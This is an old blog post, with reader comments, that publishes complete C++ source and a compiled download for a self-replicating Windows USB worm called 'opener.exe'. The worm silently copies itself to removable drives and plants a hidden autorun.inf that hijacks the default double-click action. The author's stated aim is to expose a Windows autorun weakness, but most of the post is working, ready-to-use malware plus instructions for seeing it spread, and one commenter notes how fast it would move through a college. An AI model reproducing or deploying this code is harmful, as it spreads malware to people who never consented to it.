Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty-much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk.. and you can always rely on Microsoft to make the potential an actual.

Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove should it? Fair enough, here's some code: 


#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

void closing()
{
	if (hmutex)
		ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
	UNREFERENCED_PARAMETER(hPrevInstance);
	UNREFERENCED_PARAMETER(lpCmdLine);

	WCHAR myfile[1024];
	GetModuleFileName(NULL, myfile, 1024);
	if (myfile[1] != L':')
		return 1;
	WCHAR cmd[1024];
	wsprintf(cmd, L"explorer %c:\\", myfile[0]);
	STARTUPINFOW si;
	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);
	PROCESS_INFORMATION po;
	memset(&po, 0, sizeof(po));
	CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);

	hmutex = CreateMutex(NULL, TRUE, L"Opener");
	if (hmutex == INVALID_HANDLE_VALUE)
		return 1;
	if (GetLastError() == ERROR_ALREADY_EXISTS) {
		CloseHandle(hmutex);
		return 1;
	}

	atexit(closing);

	HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hmyfile == NULL)
		return 1;
	DWORD szhigh = 0;
	DWORD szlow = GetFileSize(hmyfile, &szhigh);
	if (szhigh != 0) {
		CloseHandle(hmyfile);
		return 1;
	}
	void *myfilemem = malloc(szhigh * 65536 + szlow);
	DWORD nread;
	ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
	CloseHandle(hmyfile);

	while(1) {
		DWORD mask = GetLogicalDrives();
		for (int i = 0; i < 26; i++) 
			if (mask & (1 << i)) {
				WCHAR path[100];
				path[0] = L'A' + i;
				path[1] = L':';
				path[2] = L'\\';
				path[3] = 0;
				DWORD type = GetDriveType(path);
				if (type == DRIVE_REMOVABLE) {
					DWORD spc, bps, nfc, tnc;
					if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
						if (nfc < tnc) {
							wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
							if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
								HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
								if (h != INVALID_HANDLE_VALUE) {
									DWORD written;
									WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
									CloseHandle(h);
									wsprintf(path, L"%c:\\opener.exe", L'A' + i);
									h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
									if (h != INVALID_HANDLE_VALUE) {
										WriteFile(h, myfilemem, szlow, &written, NULL);
										CloseHandle(h);
									} else {
										wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
										DeleteFile(path);
									}
								}
							}
						}
					}
				}
			}
		Sleep(1000 * 60);
	}

	return 0;
}
download: opener.cpp and here's it compiled: opener.exe.

How does it work?

It's really quite simple:

  1. Open an explorer window for the drive we're running from.
  2. Make sure there is only one copy of opener.exe running.
  3. Scan the available drives for any that are removable.
  4. Check that there is some free space on the drive.
  5. Check that the drive doesn't already have an autorun.inf.
  6. Dump the following into autorun.inf: 
    [autorun]
shell\eject=Eject
shell\eject\command=opener.exe
shell=eject
    This creates a new shell command which I've just randomly named "Eject" and, importantly, makes it the default action.
  7. Write a copy of opener.exe to the drive.
  8. Mark both autorun.inf and opener.exe as hidden.
  9. Do any other removable drives we can find.
  10. Wait about a minute.
  11. Go back to step 3.

So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, and use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change - it won't pop up now. You may have had this experience before.. it's kinda random when Windows will and wont pop up that box.

No matter, go to My Computer as you typically would and double click on the drive that has been found.. as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again.

And so the cycle continues.

Dear Microsoft, please fix, thanks.


QuantumG


<< back to my home page
Locke says:
Yet another glaring hole in Microsoft's logic which will most definitely be answered by a statement that the user should only ever be using Microsoft approved hardware and software that has never been touched since they approved it and shrink-wrapped it. So, if you aren't using their stuff and you get a virus, your warranty is void, and no soup for you.
Locke says:
I've posted about this on my blog and linked and credited you. Let me know what you think of my site if you get a chance. Thanks, Locke
Linux says:
Linux
Linux says:
Disregard that, I suck cocks.
Linus says:
I'm not sure who thinks he's funnier linux or the guy posting as linux...
Impotence says:
This would spread through a college or university like wildfire, half of the people i know at college have a flash drive with them at all times and are copying things onto over peoples flash drives for them (Study notes etc)
MatthewT says:
Amazing concept, more people need to know of this.
This guy thinks you should just disable autorun, but a link is all he says:
http://features.engadget.com/2004/06/29/how-to-tuesday-disable-autorun-on-windows/
Patrick says:
http://wiki.hak5.org/wiki//USB_Hacksaw
Bill says:
Autorun should be disabled by default, like hiding filename suffixes.
Leo. says:
Stop criticize Windows. For the people who don't care/understand about this, Windows will remain the best option. For who that understand this... well, we already know that windows is shit.
Par[A]doX says:
Oh my god! This is the worst thing that can ever happen in the history of things happening!
Nevermind the fact that this, Hacksaw, and USBDumper are all easily detected by most antivirus software on the market as being malicious and therefore incapable of being downloaded, let alone executed.
WhatIsQDOS? says:
Nevermind that anyone who understands the code above can alter and
recompile it, voiding antivirus signature detection.

Nevermind that any single point of failure in 3rd party "bulletproof vest"
security products gives the attacker full ownership of a target machine
running any Microsoft operating system.

Nevermind that millions of botnet zombie computers, all of them with Microsoft
operating systems, are dutifully downloading their antivirus updates every
day, in between spraying spam across the world and participating in DDOS
attacks.
Imposter says:
Oh, windows. When will you learn?
Embryonic says:
Ubuntu =P
Luke says:
Ubuntu rocks, I agree with Embryonic :D
paperbeatsrock says:
www.fatchicksinpartyhats.com would destroy that virus... and all of mankind!

I thought I heard you say something...
Your name: